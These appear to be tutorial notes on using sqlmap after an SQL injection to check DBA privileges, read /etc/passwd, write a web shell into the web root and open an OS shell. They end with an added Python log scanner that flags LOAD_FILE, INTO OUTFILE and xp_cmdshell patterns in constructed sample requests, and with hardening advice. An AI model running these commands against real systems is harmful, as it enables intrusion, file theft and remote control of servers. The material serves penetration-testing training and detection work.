SQLMap has the ability to utilize an SQL injection to read and write files on the local system outside the DBMS. SQLMap can also attempt to give us direct command execution on the remote host if we have the proper privileges.
File Read/Write
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE passwd;
Checking for DBA Privileges
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba
sqlmap -u "http://www.example.com/?id=1" --is-dba

If the DBMS user lacks the privileges needed to read files (for example the MySQL FILE privilege), a later --file-read attempt fails with output such as:

[17:31:43] [INFO] fetching file: '/etc/passwd'
[17:31:43] [ERROR] no data retrieved

Reading Local Files
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
cat ~/.sqlmap/output/www.example.com/files/_etc_passwd

Writing Local Files
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"

OS Command Execution
We can test SQLMap's ability to give us an OS shell without manually writing a remote shell. SQLMap uses several techniques to get a remote shell through an SQL injection vulnerability: writing a web shell to disk (as we just did), creating SQL functions that execute commands and retrieve their output, or calling SQL procedures that directly execute OS commands, such as xp_cmdshell in Microsoft SQL Server. To get an OS shell with SQLMap, we can use the --os-shell option, as follows:
sqlmap -u "http://www.example.com/?id=1" --os-shell

Better chance of direct output:
sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E
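From the defender's side, the file read, file write and OS shell features above all depend on a handful of DBMS primitives (LOAD_FILE / LOAD DATA INFILE, INTO OUTFILE, xp_cmdshell and similar) appearing in the injected query. The following is an added example (not part of these notes or of sqlmap itself) that scans web server access log lines for those primitives after URL decoding; the log format, IP addresses and request lines are constructed for the example.

```python
"""Added example: flag access-log requests that carry the SQL primitives behind
sqlmap's --file-read, --file-write and --os-shell. Sample log lines are
constructed, not real traffic."""
import re
from urllib.parse import unquote_plus

# Primitives behind the three sqlmap features discussed in the notes.
INDICATORS = {
    "file-read":  re.compile(r"\bload_file\s*\(|\bload\s+data\s+(local\s+)?infile\b", re.I),
    "file-write": re.compile(r"\binto\s+(out|dump)file\b", re.I),
    "os-exec":    re.compile(r"\bxp_cmdshell\b|\bsys_exec\s*\(|\bsys_eval\s*\(", re.I),
}

# Request line of a combined-format access log: "METHOD /path?query HTTP/x"
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/[\d.]+"')


def classify_request(target: str):
    """Return the indicator names matched by one request target."""
    # Decode twice: sqlmap and WAF-evasion tamper scripts may double-encode.
    decoded = unquote_plus(unquote_plus(target))
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def scan_access_log(lines):
    """Return (line_number, client_ip, indicators) for each suspicious request."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        found = classify_request(m.group(1))
        if found:
            hits.append((no, line.split()[0], found))
    return hits


SAMPLE_LOG = [  # constructed lines for the example
    '10.0.0.5 - - [12/Mar/2024:17:31:43 +0000] "GET /case1.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Mar/2024:17:31:44 +0000] "GET /case1.php?id=1%20UNION%20SELECT%20LOAD_FILE%28%27%2Fetc%2Fpasswd%27%29 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [12/Mar/2024:17:31:45 +0000] "GET /case1.php?id=1%20UNION%20SELECT%20%27x%27%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Fhtml%2Fshell.php%27 HTTP/1.1" 500 128',
    '10.0.0.9 - - [12/Mar/2024:17:31:46 +0000] "GET /case1.php?id=1%3B+EXEC+xp_cmdshell+%27whoami%27 HTTP/1.1" 500 128',
]

if __name__ == "__main__":
    for no, ip, found in scan_access_log(SAMPLE_LOG):
        print(f"line {no}: {ip} -> {', '.join(found)}")
```

Restricting the application's DBMS account (no FILE privilege, no xp_cmdshell, a restrictive secure_file_priv) removes the primitives these rules look for, so the rules are a second layer rather than the only control.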